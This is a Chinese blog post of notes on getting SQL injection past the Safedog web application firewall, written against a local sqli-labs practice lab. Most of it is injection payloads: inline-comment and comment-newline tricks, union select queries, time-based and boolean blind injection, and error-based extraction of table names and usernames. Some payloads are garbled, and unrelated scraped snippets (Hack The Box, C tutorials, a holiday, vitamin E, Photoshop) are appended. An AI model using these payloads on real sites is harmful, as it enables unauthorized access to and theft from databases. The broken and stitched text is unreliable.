SQL注入bypass笔记
waf是通过使用一组规则来区分正常请求和恶意请求的。例如:安全狗、云锁、D盾等。
绕过:既然是存在规则匹配,那么就可以想 *** 绕过规则匹配。比如常见的黑名单限制,黑名单模型使用预设
win7
phpstdy(mysql:5.7.0 php:5.3.29)
网站apache安全狗(4.0.28330.0)
sqlilabs靶场
将防护等级调到更高级:
and 1=1 绕过
首先,尝试' and 1=1和' or 1=1
都会被防火墙拦截。 尝试替换and和or关键字:替换成&&, ||
还是被狗拦截掉了。那么就要想办法把1=1入手,要么将1=1换掉,要么使用尝试内联注释。首先,含是使用and或者or,
将1=1改成负数-1=-1
可以看到成功绕过,说明安全狗没有对负数进行检测。
接着尝试内联注释:
and1=1--+ --拦截 and1=1--+ --不拦截
order by 绕过:
就使用内联注释
orderby+3--+ --不拦截 order%23%0Aby 3--+ --不拦截,当发现%23注释之后,不会再去检查了,所以就利用单行注释和换行来绕过
一般的安全狗对order by 查询中间添加一些无用的数据不会拦截。
union select 绕过
内联注入:
union 1,2,3
当然也可以fuzz中间的版本号:0440 – 10449 11440-11449 12440-12449 13440-13449 14400-14499 15440-15449 16440-16449 17440-17449 18440-18449 19440-19449都可以。
注:MySQL数据库为了保持与其他数据库兼容,特意新添加的功能。 为了避免从MySQL中导出的SQL语句不能被其他数据库使用,它把一些 MySQL特有的语句放在 /! .https://www.freebuf.com/articles/ 中,这些语句在不兼容的数据库中使用时便 不会执行。而MySQL自身却能识别、执行。 /50001/表示数据库版本>=5.00.01时中间的语句才会执行。
第二种 *** :注释绕过
union %23%0aall select ——union 注释+换行 all select(做出多次查询)
函数的注入
采用的办法内联注释:
union 1,hex(user()),3 union 1,hex(database()),3 union 1,hex(@@version()),3 union 1,hex(@@datadir),3
另一种 *** :
?
这里就是--+注释符把后面的/形成了一个完整的sql语句。
对于information_schema是没有进行检测的,所以只要保证前面的union和select绕过就可以。
1:
?id=-1'union 1,group_concat(schema_name),3 from information_schema.schemata--+
2:
?
? ?
那么通过这两种 *** ,就能得到数据库的表,列命和字段内容。
盲注
1.时间盲注:
利用 *** :内联注释
? ?(),1,1))=115,sleep(3),1)--+*/ ?),1,1))=115,sleep(),1)--+*/ ?id=1' if(ascii(substr(database(),1,1))=115,sleep(4),1)--+
利用 *** :if 前面添加!~ -
?id=1' and !if(ascii(substr(database(),1,1))=115,sleep(3),1)--+ ?id=1' and ~if(ascii(substr(database(),1,1))=115,sleep(3),1)--+ ?id=1' and -if(ascii(substr(database(),1,1))=115,sleep(3),1)--+
bool盲注
盲注 *** :内联注释
?id=1' length(database())=8--+ ?(),1)='s'--+ ?() limit 0,1),1,1))=101--+ ?database()),0x7e))--+ ?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(version()),0x7e))--+
爆表:
? ?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(select%20group_concat(table_name)from%23%0ainformation_schema.tables%23%0awhere%20table_schema=0x7365637572697479),0x7e))--+
爆列名更上面的一样。那么爆字段内容不能直接select username from users limit 1而是在from后面再写一个注释换行。
?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(select%20username%20from%23%0ausers%20limit%201),0x7e))--+
对于这个版本的安全狗,它对http参数污染能够直接绕过。但是有的含是需要结合内联注释、函数、反引号、注释换行结合起来进行绕狗。但是,最新的安全狗,它的规则多了,防护也高,只有不断尝试这些 *** ,或者一些新的思路,然后才能绕过。对与绕过还是多尝试,自己搭环境去做,然后慢慢有了思路,就可以绕过了
payload参考链接https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI?
基础信息简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透链接:https://www.h...
求好的c语言程序设计视频教程 1、《C语言视频教程》百度网盘高清资源免费在线观看 链接:https://pan.baidu.com/s/1QAWDHhzlj0ytuxnPZiBYMw?pwd=p0l9...
米旦节大家一定都非常熟悉,现在米旦节还是一个法定节假日,每年米旦节都会放假,米旦节的时间是每年的1月1日,而米旦节其实也是有一些特别的含义的,可能大家不太了解,对于米旦节的意义我们还是要了解一些的,那...
维生素e能祛斑吗(用维生素E擦脸真的能祛斑吗)很多女性发现自己脸上长斑了,通常会想通过一些不花钱的偏方来实现祛斑,令皮肤恢复白嫩无暇。于是,网上就开始流传出维生素E擦脸能有效祛斑。但是这种说法是真...
本文导读目录: 1、电影名字"狙击手"前面有几个字的是什么 2、关于一部我小时侯看过的国产动画 3、《马丁的早晨》和《黑客狙击手》这两部动画分别是哪国的动画 4、关于计算机的动画片 5...
图层合并在Photoshop是一种比较常见的功能,本文详细介绍图层合并常用的知识点和小技巧,让你能够更加灵活使用图层合并功能。 1工具/原料 Adobe Photoshop CS6软件2思维导图...